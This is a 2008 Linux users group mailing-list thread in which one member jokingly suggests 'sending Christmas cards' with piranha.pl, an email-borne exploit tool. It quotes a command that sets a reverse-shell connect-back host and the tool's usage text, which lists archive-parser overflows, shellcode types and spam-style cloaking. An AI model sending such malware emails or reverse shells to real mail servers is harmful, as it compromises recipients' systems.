More the timing than anything On 12/25/08, Lisa Kachold wrote: > > cryptworks said: > > >> Date: Thu, 25 Dec 2008 13:03:10 -0700 >> From: cryptworks@gmail.com >> To: plug-discuss@lists.plug.phoenix.az.us >> Subject: Re: HackFest Series: Email Christmas Cheer >> >> That's twisted but funny > > It's my job to educate ALL as we happily anesthetize each other (and Noob > Linux Penguins) with how safe (and virus free) NIX is; someone must be the > voice that reminds all that Linux is a powerful tool, to be wielded > carefully and TRUST is the basis of ALL SECURITY. > > But you can trust me....really! > > www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | > hackfest.obnosis.com (503)754-4452 > January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security > Forensics @ UAT 1/10/09 12-3PM > Take the Black [Linux/Vista-XP/OS X BackTrack3] Pill & leave SecurityMatrix, > or take the Blue [XP/Vista Update] Pill & stay happily ignorant. > >> On 12/25/08, Lisa Kachold wrote: >> > >> > >> > >> > >> > >> > >> > >> > >> > >> > >> > Send some Christmas cards: >> > >> > $ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a >> > myname@mydomain.com >> > >> > >> > Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS] >> > >> > Mandatory arguments: >> > -e+ Exploit number to use (See below) >> > -h+ SMTP server to test >> > -a+ Destination email address used in probing >> > >> > Optional arguments: >> > -s+ Shellcode type to inject into exploits (See below) >> > -c+ Cloaking style (See below) >> > -d+ Try to vanish attachments from MUA's view (See below) >> > -v Attach EICAR virus to improve stealthness >> > -z Pack all the malware into a tarball to be less noisy >> > -p+ Port to use in reverse shell or bind shell >> > -l+ Host to connect back in reverse shell mode >> > >> > Valid exploits numbers: >> > 0 OSVDB #5753: LHA get_header File Name Overflow >> > 1 OSVDB #5754: LHA get_header Directory Name Overflow >> > 2 OSVDB #6456: file readelf.c tryelf() ELF Header >> > Overflow >> > 3 OSVDB #11695: unarj Filename Handling Overflow >> > 4 OSVDB #23460: ZOO combine File and Dir name overflow >> > 5 OSVDB #15867: Convert UUlib uunconc integer overflow >> > 6 OSVDB #XXX: ZOO next offset infinite loop DoS >> > >> > Valid shellcode types: >> > 0 TCP reverse shell >> > 1 UDP reverse shell >> > 2 TCP bind shell >> > >> > Valid cloaking styles (consult whitepaper for visual result): >> > 0 No cloaking at all (default) >> > 1 Viagra spam message >> > 2 "Look at the pictures I promised you!" >> > >> > Vanishing techniques for attachments: >> > 0 No vanishing at all (default) >> > 1 Multipart/alternative trick >> > 2 trick >> > >> > www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | >> > hackfest.obnosis.com (503)754-4452 >> > January PLUG HackFest = Kristy Westphal, AZ Department of Economic >> > Security >> > Forensics @ UAT 1/10/09 12-3PM >> > Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix, >> > or >> > take the Blue [XP/Vista Update] Pill & stay happily ignorant. >> > >> > http://uncyclopedia.wikia.com/wiki/Satan_Claus >> > _________________________________________________________________ >> > Send e-mail anywhere. No map, no compass. >> > http://windowslive.com/oneline/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008 >> >> -- >> Sent from my mobile device >> >> A mouse trap, placed on top of your alarm clock, will prevent you from >> rolling over and going back to sleep after you hit the snooze button. >> >> Stephen >> --------------------------------------------------- >> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us >> To subscribe, unsubscribe, or to change your mail settings: >> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > > _________________________________________________________________ > It's the same Hotmail(R). If by "same" you mean up to 70% faster. > http://windowslive.com/online/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_broad1_122008 -- Sent from my mobile device A mouse trap, placed on top of your alarm clock, will prevent you from rolling over and going back to sleep after you hit the snooze button. Stephen --------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss